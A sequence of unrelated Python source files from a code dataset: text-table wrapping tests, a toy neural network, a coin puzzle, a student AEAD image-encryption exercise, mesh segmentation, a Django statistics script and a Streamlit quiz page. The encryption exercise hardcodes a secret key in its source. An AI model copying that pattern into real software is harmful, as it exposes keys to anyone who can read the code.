)\n\n\n@pytest.mark.parametrize(\"width_fill\", [None, 30])\ndef test_widths_all_none(width_fill: int | None) -> None:\n tbl = Txtble(\n [[LONG_STRING, LONG_STRING]],\n width_fill=width_fill,\n widths=None,\n )\n assert str(tbl) == (\n \"+--------------------------------------------------------\"\n \"+--------------------------------------------------------+\\n\"\n \"|Lorem ipsum dolor sit amet, consectetur adipisicing elit\"\n \"|Lorem ipsum dolor sit amet, consectetur adipisicing elit|\\n\"\n \"+--------------------------------------------------------\"\n \"+--------------------------------------------------------+\"\n )\n\n\ndef test_wrap_multiline() -> None:\n tbl = Txtble([[\"Lorem ipsum\\n\" + LONG_STRING]], widths=[20])\n assert str(tbl) == (\n \"+--------------------+\\n\"\n \"|Lorem ipsum |\\n\"\n \"|Lorem ipsum dolor |\\n\"\n \"|sit amet, |\\n\"\n \"|consectetur |\\n\"\n \"|adipisicing elit |\\n\"\n \"+--------------------+\"\n )\n\n\ndef test_wrap_fullwidth() -> None:\n tbl = Txtble(\n [[\"Lorem ipsum dolor sit amet\"]],\n widths=[30],\n )\n assert str(tbl) == (\n \"+------------------------------+\\n\"\n \"|Lorem ipsum |\\n\"\n \"|dolor sit amet |\\n\"\n \"+------------------------------+\"\n )\n\n\ndef test_wrap_fullwidth_long_word() -> None:\n tbl = Txtble(\n [[\"antidisestablishmentarianism\"]],\n widths=[30],\n )\n assert str(tbl) == (\n \"+------------------------------+\\n\"\n \"|antidisestablis|\\n\"\n \"|hmentarianism |\\n\"\n \"+------------------------------+\"\n )\n\n\ndef test_wrap_combining() -> None:\n tbl = Txtble(\n [\n [\n \"L\\u0301o\\u0301r\\u0301e\\u0301m\\u0301\"\n \" i\\u0301p\\u0301s\\u0301u\\u0301m\\u0301\"\n \" d\\u0301o\\u0301l\\u0301o\\u0301r\\u0301\"\n \" s\\u0301i\\u0301t\\u0301\"\n \" a\\u0301m\\u0301e\\u0301t\\u0301\"\n ],\n ],\n widths=[30],\n )\n assert str(tbl) == (\n \"+------------------------------+\\n\"\n \"|L\\u0301o\\u0301r\\u0301e\\u0301m\\u0301\"\n \" i\\u0301p\\u0301s\\u0301u\\u0301m\\u0301\"\n \" d\\u0301o\\u0301l\\u0301o\\u0301r\\u0301\"\n \" s\\u0301i\\u0301t\\u0301\"\n \" a\\u0301m\\u0301e\\u0301t\\u0301 |\\n\"\n \"+------------------------------+\"\n )\n\n\ndef test_wrap_fullwidth_builtin_len() -> None:\n tbl = Txtble(\n [[\"Lorem ipsum dolor sit amet\"]],\n len_func=len,\n widths=[30],\n )\n assert str(tbl) == (\n \"+------------------------------+\\n\"\n \"|Lorem ipsum dolor sit amet |\\n\"\n \"+------------------------------+\"\n )\n\n\ndef test_wrap_combining_builtin_len() -> None:\n tbl = Txtble(\n [\n [\n \"L\\u0301o\\u0301r\\u0301e\\u0301m\\u0301\"\n \" i\\u0301p\\u0301s\\u0301u\\u0301m\\u0301\"\n \" d\\u0301o\\u0301l\\u0301o\\u0301r\\u0301\"\n \" s\\u0301i\\u0301t\\u0301\"\n \" a\\u0301m\\u0301e\\u0301t\\u0301\"\n ],\n ],\n len_func=len,\n widths=[30],\n )\n assert str(tbl) == (\n \"+------------------------------+\\n\"\n \"|L\\u0301o\\u0301r\\u0301e\\u0301m\\u0301 i\\u0301p\\u0301s\\u0301u\\u0301m\\u0301 |\\n\"\n \"|d\\u0301o\\u0301l\\u0301o\\u0301r\\u0301 s\\u0301i\\u0301t\\u0301 a\\u0301m\\u0301e\\u0301t\\u0301 |\\n\"\n \"+------------------------------+\"\n )\n\n\ndef test_wrap_padding() -> None:\n tbl = Txtble([[LONG_STRING]], padding=2, widths=[30])\n assert str(tbl) == (\n \"+----------------------------------+\\n\"\n \"| Lorem ipsum dolor sit amet, |\\n\"\n \"| consectetur adipisicing elit |\\n\"\n \"+----------------------------------+\"\n )\n\n\n@pytest.mark.parametrize(\"s\", [LONG_STRING, \"\"])\n@pytest.mark.parametrize(\"width\", [-42, 0, \"\", \"q\"])\ndef test_invalid_width(s: str, width: int | str) -> None:\n tbl = Txtble([[s]], widths=[width]) # type: ignore[list-item]\n with pytest.raises((TypeError, ValueError)):\n str(tbl)\n\n\ndef test_wrap_header() -> None:\n tbl = Txtble([[LONG_STRING]], headers=[LONG_STRING], widths=[20])\n assert str(tbl) == (\n \"+--------------------+\\n\"\n \"|Lorem ipsum dolor |\\n\"\n \"|sit amet, |\\n\"\n \"|consectetur |\\n\"\n \"|adipisicing elit |\\n\"\n \"+--------------------+\\n\"\n \"|Lorem ipsum dolor |\\n\"\n \"|sit amet, |\\n\"\n \"|consectetur |\\n\"\n \"|adipisicing elit |\\n\"\n \"+--------------------+\"\n )\n\n\ndef test_wrap_none_str() -> None:\n tbl = Txtble([[None]], none_str=LONG_STRING, widths=[20])\n assert str(tbl) == (\n \"+--------------------+\\n\"\n \"|Lorem ipsum dolor |\\n\"\n \"|sit amet, |\\n\"\n \"|consectetur |\\n\"\n \"|adipisicing elit |\\n\"\n \"+--------------------+\"\n )\n\n\ndef test_wrap_header_fill_row_fill() -> None:\n tbl = Txtble(\n [[\"foo\"], [\"bar\", \"baz\"]],\n header_fill=LONG_STRING,\n headers=[\"Quux\"],\n row_fill=LONG_STRING,\n widths=[None, 20],\n )\n assert str(tbl) == (\n \"+----+--------------------+\\n\"\n \"|Quux|Lorem ipsum dolor |\\n\"\n \"| |sit amet, |\\n\"\n \"| |consectetur |\\n\"\n \"| |adipisicing elit |\\n\"\n \"+----+--------------------+\\n\"\n \"|foo |Lorem ipsum dolor |\\n\"\n \"| |sit amet, |\\n\"\n \"| |consectetur |\\n\"\n \"| |adipisicing elit |\\n\"\n \"|bar |baz |\\n\"\n \"+----+--------------------+\"\n )\n\n\ndef test_wrap_empty() -> None:\n tbl = Txtble([[\"\"]], widths=[20])\n assert (\n str(tbl)\n == \"+--------------------+\\n| |\\n+--------------------+\"\n )\n\n\ndef test_wrap_long_word_short_words() -> None:\n tbl = Txtble(\n [['\"Antidisestablishmentarianism\" is not that hard to spell.']],\n widths=[20],\n )\n assert str(tbl) == (\n \"+--------------------+\\n\"\n '|\"Antidisestablishmen|\\n'\n '|tarianism\" is not |\\n'\n \"|that hard to spell. |\\n\"\n \"+--------------------+\"\n )\n\n\ndef test_wrap_long_word_short_words_no_break_long_words() -> None:\n tbl = Txtble(\n [['\"Antidisestablishmentarianism\" is not that hard to spell.']],\n break_long_words=False,\n widths=[20],\n )\n assert str(tbl) == (\n \"+------------------------------+\\n\"\n '|\"Antidisestablishmentarianism\"|\\n'\n \"|is not that hard to |\\n\"\n \"|spell. |\\n\"\n \"+------------------------------+\"\n )\n\n\n@pytest.mark.parametrize(\"hyph_break\", [True, False])\ndef test_wrap_hyphen_after_width(hyph_break: bool) -> None:\n tbl = Txtble(\n [[\"Antidisestablishmentarianism-length words are hard to wrap.\"]],\n break_on_hyphens=hyph_break,\n widths=[20],\n )\n assert str(tbl) == (\n \"+--------------------+\\n\"\n \"|Antidisestablishment|\\n\"\n \"|arianism-length |\\n\"\n \"|words are hard to |\\n\"\n \"|wrap. |\\n\"\n \"+--------------------+\"\n )\n\n\ndef test_wrap_hyphen_after_width_no_break_long_words() -> None:\n tbl = Txtble(\n [[\"Antidisestablishmentarianism-length words are hard to wrap.\"]],\n break_long_words=False,\n widths=[20],\n )\n assert str(tbl) == (\n \"+-----------------------------+\\n\"\n \"|Antidisestablishmentarianism-|\\n\"\n \"|length words are |\\n\"\n \"|hard to wrap. |\\n\"\n \"+-----------------------------+\"\n )\n\n\ndef test_wrap_even_multiple() -> None:\n tbl = Txtble(\n [['\"The time has come,\" the Walrus said, \"To talk of many things\"']],\n widths=[20],\n )\n assert str(tbl) == (\n \"+--------------------+\\n\"\n '|\"The time has come,\"|\\n'\n '|the Walrus said, \"To|\\n'\n '|talk of many things\"|\\n'\n \"+--------------------+\"\n )\n\n\ndef test_wrap_before_trailing_space() -> None:\n tbl = Txtble([['\"The time has come.\" ']], widths=[20])\n assert str(tbl) == (\n \"+--------------------+\\n\"\n '|\"The time has come.\"|\\n'\n \"| |\\n\"\n \"+--------------------+\"\n )\n\n\ndef test_wrap_bad_len_func() -> None:\n width = 20\n\n def len_func(s: str) -> int:\n return -1 if 0 < len(s) <= width else len(s)\n\n tbl = Txtble([[LONG_STRING]], len_func=len_func, widths=[width])\n with pytest.raises(IndeterminateWidthError):\n str(tbl)\n\n\ndef test_wrap_implementation_bsearch_boundary() -> None:\n \"\"\"\n Test a boundary condition in the implementation of the long-word-splitting\n algorithm\n \"\"\"\n tbl = Txtble([[\"antidisestablishme\\u0301n\\uFF54arianism\"]], widths=[20])\n assert str(tbl) == (\n \"+--------------------+\\n\"\n \"|antidisestablishme\\u0301n |\\n\"\n \"|\\uFF54arianism |\\n\"\n \"+--------------------+\"\n )\n\n\n# vim:set nowrap:\n","repo_name":"jwodder/txtble","sub_path":"test/test_wrap.py","file_name":"test_wrap.py","file_ext":"py","file_size_in_byte":21158,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"72"} +{"seq_id":"16952890322","text":"\nimport numpy as np\n\nfrom src import Layer,dataHandler\n\n\n\nclass Model:\n def __init__(self, lr, epochs,output_size,batch_size=64):\n self.lr = lr\n self.epochs = epochs\n self.output_size = output_size\n self.batch_size = batch_size \n \n def layer_init(self):\n\n self.Layers=[\n Layer.Input(None),\n\n\n Layer.Dense(self.input_size, 20, activation=\"relu\"),\n Layer.Dense(20, 10, activation=\"relu\"),\n Layer.Dense(10, 10, activation=\"relu\"),\n Layer.Dense(10,self.output_size, activation=\"softmax\"),\n\n\n Layer.Output(None)\n ]\n \n \n \n def forward(self):\n for i,layer in enumerate(self.Layers):\n if i!=0 and i!=len(self.Layers) -1:\n layer.forward()\n\n def backward(self):\n for i,layer in enumerate(reversed(self.Layers)):\n if i!=0 and i!=len(self.Layers) -1:\n layer.backward()\n\n def update(self,lr):\n for i,layer in enumerate(self.Layers):\n if i!=0 and i!=len(self.Layers) -1:\n layer.update(lr)\n \n def flush(self):\n for i,layer in enumerate(self.Layers):\n if i!=0 and i!=len(self.Layers) -1:\n layer.flush()\n\n def get_predictions(self): \n return np.argmax(self.Layers[len(self.Layers) -2].output, 0) \n\n def get_accuracy(self,predictions, Y): \n return np.sum(predictions == Y) / Y.size \n\n def fit(self, X, Y,diagnostics=True,plot=False,save_best_model=True): \n self.input_size = X.shape[0] \n prevAccuracy = 0.0\n batches_X = np.array_split(X,self.batch_size,axis=1)\n batches_Y = np.array_split(Y,self.batch_size,axis=0)\n self.layer_init()\n for epoch in range(self.epochs):\n for i,batch in enumerate(batches_X):\n self.X = batch\n self.Y = batches_Y[i]\n self.Layers[0] = Layer.Input(self.X)\n self.Layers[-1] = Layer.Output(self.Y)\n Layer.compile(self.Layers,self.Y)\n\n\n self.forward()\n self.backward()\n self.update(self.lr)\n #self.flush()\n\n predictions = self.get_predictions()\n accuracy = self.get_accuracy(predictions, self.Y)\n\n model_paramaters = self.Layers[1:-1]\n if accuracy>0.80 and accuracy>prevAccuracy and save_best_model:\n Wb = self.Layers[1:-1]\n dataHandler.writeData(Wb)\n prevAccuracy=accuracy\n\n ################################ DEBUGGING ###########################\n if diagnostics:\n #if i%8 == 0:\n # print(\"Batch: \",i*len(self.Y))\n if epoch % 50 == 0 and i==0: \n \n print(\"\\rEpoch: \", epoch)\n print(np.asarray(((np.unique(predictions, return_counts=True)))).T)\n print(np.asarray(((np.unique(self.Y, return_counts=True)))).T)\n \n print(\"Accuracy: \", accuracy)\n print(\"Max Accuracy: \",prevAccuracy)\n print(\"------------------------\\n\")\n ################################ DEBUGGING ###########################\n \n \n print(\"Max acc: \", prevAccuracy)\n \n \n return model_paramaters\n def evaluate(self,X,Y, W1, b1, W2, b2):\n\n _,_,_, A2 = self.forward(X,W1, b1, W2, b2)\n predictions = self.get_predictions(A2)\n return self.get_accuracy(predictions, Y)\n\n def predict(self,X,W1,b1,W2,b2):\n Z1 = W1.dot(X) + b1 \n A1 = self.ReLU(Z1) \n Z2 = W2.dot(A1) + b2 \n A2 = self.softmax(Z2) \n \n return Z2\n\n def load(path): #rework\n data = []\n with open(path) as file:\n lines = file.readlines()\n \n for i in lines:\n \n i = i.replace(\"\\n\",\"\")\n \n data.append(i)\n data = np.array((data)).reshape(len(data),-1)\n return data\n\n","repo_name":"Skeibol/ToNNi-Neural-Network","sub_path":"old/ToNNi.py","file_name":"ToNNi.py","file_ext":"py","file_size_in_byte":4328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"818334879","text":"# The trick to realise here is that the two groups don't have to be the same size.\n# Instead let's split them into a big pile of 90 coins and a small pile of 10 coins.\n# We don't know how many heads are in either pile, it couĺd be anywhere from 0 to 10.\n# Let's say there are n heads in the large pile. That leaves 10-n heads in the small pile.\n# If we turn over all of the coins in the small pile we get 10-(10-n) heads which simplifies to n.\n# Therefore both piles will have the same number of heads as each other,\n# even though we don't know how many (if any) that is.\n#\n\n# ( 0 tail) (1 head)\ndef heads_tails(h, t):\n head = \"1\" * h\n\n tail = \"0\" * t\n\n coins = head + tail\n\n print(coins)\n\n list1 = coins[:t]\n list2 = coins[t:]\n print(list1)\n print(list2)\n\n ans = []\n for i in list2:\n if i == \"0\":\n ans.append(1)\n else:\n ans.append(0)\n\n print(ans)\n\n\n# Num_Heads = 10\n# Num_Tails = 90\n\nNum_Heads = int(input(\"Enter number of heads\"))\nNum_Tails = int(input(\"Enter number of tails\"))\nheads_tails(Num_Heads, Num_Tails)\n\n","repo_name":"ahmaddroobi99/Security_Project_2022","sub_path":"CoinProblemSimu.py","file_name":"CoinProblemSimu.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36331456642","text":"import sys\nimport base64\nfrom aead import AEAD as a\nimport os\nimport logging\n\n# disclaimer: if you get the incorrect padding error when running this program, please\n# delete the header and body output files and run it again.\n# This might take a few tries, I have no idead why this happens, since our decode\n# function should not raise exceptions. Also, I have no idea why rerunning the program makes\n# this work, but it does.\n\n\n# copied from https://stackoverflow.com/questions/2941995/python-ignore-incorrect-padding-error-when-base64-decoding\n# because I kept on getting the error 'Incorrect padding'\ndef base64_decode(s):\n \"\"\"Add missing padding to string and return the decoded base64 string.\"\"\"\n log = logging.getLogger()\n s = str(s).strip()\n try:\n return base64.b64decode(s)\n except TypeError:\n padding = len(s) % 4\n if padding == 1:\n log.error(\"Invalid base64 string: {}\".format(s))\n return ''\n elif padding == 2:\n s += b'=='\n elif padding == 3:\n s += b'='\n return base64.b64decode(s)\n\n\ndef read_file(path):\n\tfile = open(path, \"rb\")\n\tbytes = file.read()\n\tfile.close()\n\treturn bytes\n\t\n\ndef write(bytes, path):\n\tfile = open(path, \"wb\")\n\tfile.write(bytes)\n\tfile.close()\n\n\n# first we create copy header of the penguin in the file 'header'\nos.system(\"head -c 54 tux.bmp >> header\")\n\n# and the content itself in a the file 'body'\nos.system(\"tail -c +54 tux.bmp >> body\")\n\nSECRET_KEY = \"Gzb9X-EAiZsk5-7OVZe0KrwIiLxySqYWfJFyyDtPf4w=\"\n\n# we initialize a cryptorr with our secret key\ncryptor = a(SECRET_KEY)\n\n# read the contents of the header and body files just created\nheader = read_file(\"header\")\nbody = read_file(\"body\")\n\n# encrypt the content of the body and sign the header\ncipher_text = cryptor.encrypt(body, header)\n\n\n# unfortunately ciper text is in base64, so we must convert it to binary\n# We can't just use base64.b64decode(s) because the padding is\n# incorrect, so we use a dedicated function\ncipher_text = base64_decode(cipher_text)\n\n# we write the bytes into 'out'\nwrite(cipher_text, \"out\")\n\n# create the image\nos.system(\"touch img.bmp\")\n\n# append the header to the image\nos.system(\"cat header >> img.bmp\")\n\n# append the encrypted body to the image\nos.system(\"cat out >> img.bmp\")\n\n\n# do some manipulations to the associated data\n# cipher_text = ~cipher_text\n\n# we can't because cipher_text is stored as a string ...\n# we tried\n# eval(\"cipher_text = b{}\".format(cipher_text))\n# cipher_text = cipher_text.encode()\n# cipher_text = str.encode(cipher_text)\n# and many more\n# NOTHING WORKS\n\n# thus there is no point in executing the following\n#os.system(\"touch img2.bmp\")\n#os.system(\"cat header >> img2.bmp\")\n#os.system(\"cat out >> img2.bmp\")\n\n\n# file cleaning\nos.system(\"rm out\")\nos.system(\"rm header\")\nos.system(\"rm body\")\n","repo_name":"TravisPetit/ias","sub_path":"s3/a3/a3.py","file_name":"a3.py","file_ext":"py","file_size_in_byte":2833,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"43177840288","text":"import math\r\nimport numpy as np\r\nimport scipy.linalg\r\nimport scipy.cluster\r\nimport scipy.sparse\r\nimport scipy.sparse.csgraph\r\nimport scipy.sparse.linalg\r\nfrom mathutils import Vector\r\n\r\n# Code from https://github.com/kugelrund/mesh_segmentation\r\n# Changed mesh segmentation to work with trimesh library\r\n\r\n\r\ndef _face_center(mesh, face):\r\n \"\"\"Computes the coordinates of the center of the given face\"\"\"\r\n center = Vector()\r\n for vert in face.verts:\r\n center += mesh.vertices[vert.index].co\r\n return center/len(face.verts)\r\n\r\n\r\ndef _geodesic_distance(mesh, face1, face2, edge):\r\n \"\"\"Computes the geodesic distance over the given edge between\r\n the two adjacent faces face1 and face2\"\"\"\r\n edge_center = (mesh.vertices[edge[0]].co + mesh.vertices[edge[1]].co)/2\r\n return np.linalg.norm(edge_center - _face_center(mesh, face1)) + \\\r\n np.linalg.norm(edge_center - _face_center(mesh, face2))\r\n\r\n\r\ndef _angular_distance(mesh, face1, face2, face1_ind, face2_ind):\r\n \"\"\"Computes the angular distance of the given adjacent faces\"\"\"\r\n norm_1 = mesh.faces[face1_ind].normal\r\n norm_2 = mesh.faces[face2_ind].normal\r\n proj = np.dot(norm_1, norm_2)\r\n angle = np.arccos(proj)\r\n angular_distance = (1 - math.cos(angle))\r\n if(np.dot(_face_center(mesh, face2), _face_center(mesh, face1)) < 0):\r\n angular_distance *= eta\r\n return angular_distance\r\n\r\ndef _create_face_distance_matrix(mesh, delta):\r\n \"\"\"Creates the matrix of the angular and geodesic distances\r\n between all adjacent faces. The i,j-th entry of the returned\r\n matrices contains the distance between the i-th and j-th face.\r\n \"\"\"\r\n # helping vectors to create sparse matrix later on\r\n row_indices = []\r\n col_indices = []\r\n Gval = [] # values for matrix of angular distances\r\n Aval = [] # values for matrix of geodesic distances\r\n # iterate adjacent faces and calculate distances\r\n parts = mesh.faces\r\n l = len(parts)\r\n for edge in mesh.edges:\r\n adj = edge.link_faces\r\n if len(adj) != 2: continue\r\n i, j = adj[0].index, adj[1].index\r\n cmp1, cmp2 = parts[i], parts[j]\r\n Gtemp = _geodesic_distance(mesh, cmp1, cmp2, [e.index for e in edge.verts])\r\n Atemp = _angular_distance(mesh, cmp1, cmp2, i, j)\r\n Gval += [Gtemp, Gtemp]\r\n Aval += [Atemp, Atemp]\r\n row_indices += [i, j]\r\n col_indices += [j, i] # add symmetric entry\r\n\r\n Gval = np.array(Gval)\r\n Gval /= np.mean(Gval)\r\n Aval = np.array(Aval) \r\n Aval /= np.mean(Aval)\r\n values = delta * Gval + (1.0 - delta) * Aval\r\n distance_matrix = scipy.sparse.csr_matrix((values, (row_indices, col_indices)), shape=(l, l))\r\n return distance_matrix\r\n\r\ndef _create_vert_distance_matrix(mesh):\r\n # helping vectors to create sparse matrix later on\r\n row_indices = []\r\n col_indices = []\r\n Dval = [] # values for matrix of edge length\r\n # iterate adjacent faces and calculate distances\r\n parts = mesh.verts\r\n l = len(parts)\r\n for edge in mesh.edges:\r\n adj = edge.verts\r\n if len(adj) != 2: print(\"[!] Non-exclusive adjacency in dist matrix\")\r\n i, j = adj[0].index, adj[1].index\r\n Dtemp = edge.calc_length()\r\n Dval += [Dtemp, Dtemp]\r\n row_indices += [i, j]\r\n col_indices += [j, i] # add symmetric entry\r\n\r\n values = np.array(Dval) / np.mean(Dval)\r\n distance_matrix = scipy.sparse.csr_matrix((values, (row_indices, col_indices)), shape=(l, l))\r\n return distance_matrix\r\n\r\n\r\ndef _create_distance_matrix(mesh, delta=0.5, struct='faces'):\r\n \"\"\"Creates distance matrix\"\"\"\r\n if struct == 'faces':\r\n return _create_face_distance_matrix(mesh, delta), len(mesh.faces)\r\n elif struct == 'verts':\r\n return _create_vert_distance_matrix(mesh), len(mesh.verts)\r\n\r\ndef _create_affinity_matrix(mesh, struct='faces'):\r\n \"\"\"Create the adjacency matrix of the given mesh\"\"\"\r\n\r\n print(f\"segmentation: Creating {struct} distance matrices...\")\r\n distance_matrix, length = _create_distance_matrix(mesh, struct=struct)\r\n\r\n print(\"segmentation: Finding shortest paths between all faces...\")\r\n # for each non adjacent pair of faces find shortest path of adjacent faces\r\n W = scipy.sparse.csgraph.dijkstra(distance_matrix)\r\n inf_indices = np.where(np.isinf(W))\r\n W[inf_indices] = 0\r\n\r\n print(\"segmentation: Creating affinity matrix...\")\r\n # change distance entries to similarities\r\n sigma = W.sum()/(length ** 2)\r\n den = 2 * (sigma ** 2)\r\n W = np.exp(-W/den)\r\n W[inf_indices] = 0\r\n np.fill_diagonal(W, 1)\r\n\r\n return W\r\n\r\n\r\ndef _initial_guess(Q, k):\r\n \"\"\"Computes an initial guess for the cluster-centers\r\n Chooses indices of the observations with the least association to each\r\n other in a greedy manner. Q is the association matrix of the observations.\r\n \"\"\"\r\n\r\n # choose the pair of indices with the lowest association to each other\r\n min_indices = np.unravel_index(np.argmin(Q), Q.shape)\r\n\r\n chosen = [min_indices[0], min_indices[1]]\r\n for _ in range(2, k):\r\n # Take the maximum of the associations to the already chosen indices for\r\n # every index. The index with the lowest result in that therefore is the\r\n # least similar to the already chosen pivots so we take it.\r\n # Note that we will never get an index that was already chosen because\r\n # an index always has the highest possible association 1.0 to itself\r\n new_index = np.argmin(np.max(Q[chosen, :], axis=0))\r\n chosen.append(new_index)\r\n\r\n return chosen\r\n\r\ndef get_gl_eigvs(mesh, k, ev_method='dense', struct='faces', normalized=False, verbose=False):\r\n '''\r\n Perform spectral decomposition by decomposing Graph Laplacian\r\n https://www.cs.cmu.edu/~epxing/Class/10701-08s/Lecture/lecture23-Spectral.pdf\r\n '''\r\n # affinity matrix\r\n W = _create_affinity_matrix(mesh, struct)\r\n\r\n if verbose: print(\"segmentation: Calculating graph laplacian...\")\r\n\r\n D = W.sum(1)\r\n # degree matrix -> graph laplacian\r\n Dsqrt = np.sqrt(np.reciprocal(D)) ## RuntimeWarning: invalid value encountered in reciprocal\r\n L = ((W * Dsqrt).transpose() * Dsqrt).transpose()\r\n\r\n if verbose: print(\"segmentation: Calculating eigenvectors...\")\r\n # get eigenvectors\r\n if ev_method == 'dense':\r\n _, V = scipy.linalg.eigh(L, eigvals=(L.shape[0] - k, L.shape[0] - 1))\r\n else:\r\n _, V = scipy.sparse.linalg.eigsh(L, k)\r\n return V\r\n\r\ndef get_spectral_coeffs(verts, V):\r\n return V.transpose() @ verts\r\n\r\ndef from_spectral_coeffs(coeffs, V):\r\n return coeffs @ V\r\n\r\ndef segment_mesh(mesh, k, coefficients, action, ev_method, kmeans_init):\r\n \"\"\"\r\n Segments the given mesh into k clusters and performs the given\r\n action for each cluster\r\n \"\"\"\r\n\r\n # set coefficients\r\n global delta\r\n global eta\r\n delta, eta = coefficients\r\n\r\n # affinity matrix\r\n V = get_gl_eigvs(mesh, k, ev_method, True)\r\n\r\n # normalize each row to unit length\r\n V /= np.linalg.norm(V, axis=1)[:, None]\r\n\r\n if kmeans_init == 'kmeans++':\r\n print(\"segmentation: Applying kmeans...\")\r\n _, idx = scipy.cluster.vq.kmeans2(V, k, minit='++', iter=50)\r\n else:\r\n print(\"segmentation: Preparing kmeans...\")\r\n # compute association matrix\r\n Q = V.dot(V.transpose())\r\n # compute initial guess for clustering\r\n initial_centroids = _initial_guess(Q, k)\r\n\r\n print(\"segmentation: Applying kmeans...\")\r\n _, idx = scipy.cluster.vq.kmeans2(V, V[initial_centroids, :], iter=50)\r\n\r\n print(\"segmentation: Done clustering!\")\r\n # perform action with the clustering result\r\n return idx\r\n","repo_name":"VKudlay/LTV-MeshPoseTransfer","sub_path":"segmentation.py","file_name":"segmentation.py","file_ext":"py","file_size_in_byte":7703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"42608964284","text":"#!/projects/env/bin/python\n###!/Users/elijah/.virtualenvs/lengaenv/bin/python\nimport os\nimport sys\n\n\n# sys.path.append(\"/Users/elijah/Projects/LENGA/backend/live20201102/lenga\")\n\n\nsys.path.append(\"/api/lenga\")\n\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"lenga.settings.base\")\n\nimport django\n\ndjango.setup()\n\nimport pytz\nfrom datetime import date, datetime\nfrom lenga.settings.local import EXCLUDE_START_DATE\nfrom lenga.settings.local import TEST_USERS_LIST\nfrom users.models import User\nfrom learning.models import Category\nfrom data_tracking.models import LessonsStartedStats, ModulesStartedStats\n\n\n\n\ndef time_to_eat(start_time, timezone=\"Africa/Kigali\"):\n timezone = \"Africa/Kigali\"\n start_time = datetime.strptime(start_time, '%Y-%m-%d %H:%M:%S.%f %z')\n utcmoment = start_time.replace(tzinfo=pytz.utc)\n localDatetime = utcmoment.astimezone(pytz.timezone(timezone))\n start_time = localDatetime.strftime(\"%Y-%m-%d %H:%M:%S\")\n return datetime.strptime(start_time, '%Y-%m-%d %H:%M:%S')\n\ndef create_data():\n\n modules = Category.objects.all()\n users = User.objects.filter(is_active=True).exclude(\n username__icontains='test'\n ).exclude(first_name__in=TEST_USERS_LIST).exclude(\n created__date__lt=EXCLUDE_START_DATE\n )\n for user in users:\n for module in modules:\n started_lessons = LessonsStartedStats.objects.filter(\n lesson__category=module, user=user\n ).exclude(\n user__username__icontains='test'\n ).exclude(user__first_name__in=TEST_USERS_LIST).exclude(\n created__date__lt=EXCLUDE_START_DATE\n )\n if started_lessons:\n start_times_list = []\n for sl in started_lessons:\n start_times_list.append(sl.start_date)\n start_date = min(start_times_list)\n try:\n ModulesStartedStats.objects.get_or_create(\n module=module,\n user=user,\n start_date=start_date\n )\n except Exception as e:\n print(\"Module started check error:\", e)\n\n\ncreate_data()\n","repo_name":"thierrymanzi/lengaproject","sub_path":"auto_6_create_modules_started_stats.py","file_name":"auto_6_create_modules_started_stats.py","file_ext":"py","file_size_in_byte":2224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12360928601","text":"import streamlit as st\r\nfrom uility import set_page, cheering_sound\r\nfrom streamlit_extras.colored_header import colored_header\r\nfrom streamlit_extras.switch_page_button import switch_page\r\n\r\nset_page()\r\n\r\ndef congratz_page():\r\n language = st.session_state['language']\r\n st.image(\"https://animatedimagepic.com/image/congratulations/congratulations-4308.gif\")\r\n if st.session_state['scores'] == 2:\r\n if language == 'english':\r\n st.header(\"You have full scores!! \")\r\n st.header(\"Well Done!!\")\r\n elif language == 'chinese':\r\n st.header(\"恭喜您拿到满分!!\")\r\n elif st.session_state['scores'] == 1:\r\n if language == 'english':\r\n st.header(f\"You have scored {st.session_state['scores']}\")\r\n st.header(\"Keep up the good work!!\")\r\n elif language == 'chinese':\r\n st.header(f\"恭喜!您的总分是{st.session_state['scores']}分\")\r\n elif st.session_state['scores'] == 0:\r\n if language == 'english':\r\n st.header(\"You have not scored any points\")\r\n st.header(\"Don't Worry! Keep Trying!!\")\r\n st.header(\"You can approach any of our Digital Ambassador to learn more\")\r\n elif language == 'chinese':\r\n st.header(\"抱歉!您没有得分\")\r\n st.header(\"没关系!继续努力!\")\r\n st.header(\"您可以联系我们的数字大使以了解更多信息\")\r\n st.balloons()\r\n cheering_sound()\r\n if language == 'english':\r\n st.subheader(\"Book an appointment with us to learn more digital skills\")\r\n st.success(\"Geylang East Public Library - Hotline: 89401782 - 1pm to 6pm\")\r\n st.success(\"Macpherson Community Centre - Hotline: 89401662 - 10am to 6pm\")\r\n st.success(\"Kembangan Community Centre - Hotline: 91392414\")\r\n elif language == 'chinese':\r\n st.subheader(\"欢迎与我们预约以了解更多数字技能\")\r\n st.success(\"亚龙图书馆(Geylang East Library) - 热线: 89401782 - 下午1点到6点 \")\r\n st.success(\"麦波申社区中心(Macpherson CC) - 热线: 89401662 - 早上10点到下午6点\")\r\n st.success(\"景万岸社区中心(Kembangan CC) - 热线: 91392414\")\r\n submit_qns = st.button(\"RESET\")\r\n if submit_qns:\r\n del st.session_state['scores']\r\n del st.session_state['correctness']\r\n del st.session_state['df']\r\n del st.session_state['scam_question_list']\r\n del st.session_state['scam_operation']\r\n switch_page(\"home\")\r\n\r\n\r\ncongratz_page()\r\n\r\n","repo_name":"SteveDataAnalyst/2_questions","sub_path":"pages/congratz.py","file_name":"congratz.py","file_ext":"py","file_size_in_byte":2553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19578989281","text":"import boto3\nimport source.commons.environment as environment\nimport datetime\n\n\nclass S3Helper:\n\n def __init__(self):\n self.client = boto3.client('s3')\n\n def upload_file(self, file, key, extra_args=None):\n with open(file, 'rb') as f:\n self.client.upload_fileobj(f, environment.AWS_S3_BUCKET, key, ExtraArgs=extra_args)\n\n\n def s3_write(self, file_object):\n try:\n resource = boto3.resource('s3')\n filename = f'export_{datetime.datetime.now().strftime(\"%m_%d_%Y_%H_%M_%S\")}.xlsx'\n s3_object = resource.Object(bucket_name=environment.AWS_S3_BUCKET_EXPORT, key=filename)\n s3_response = s3_object.put(Body=file_object, ACL='public-read')\n s3_object.wait_until_exists()\n print(s3_response)\n return 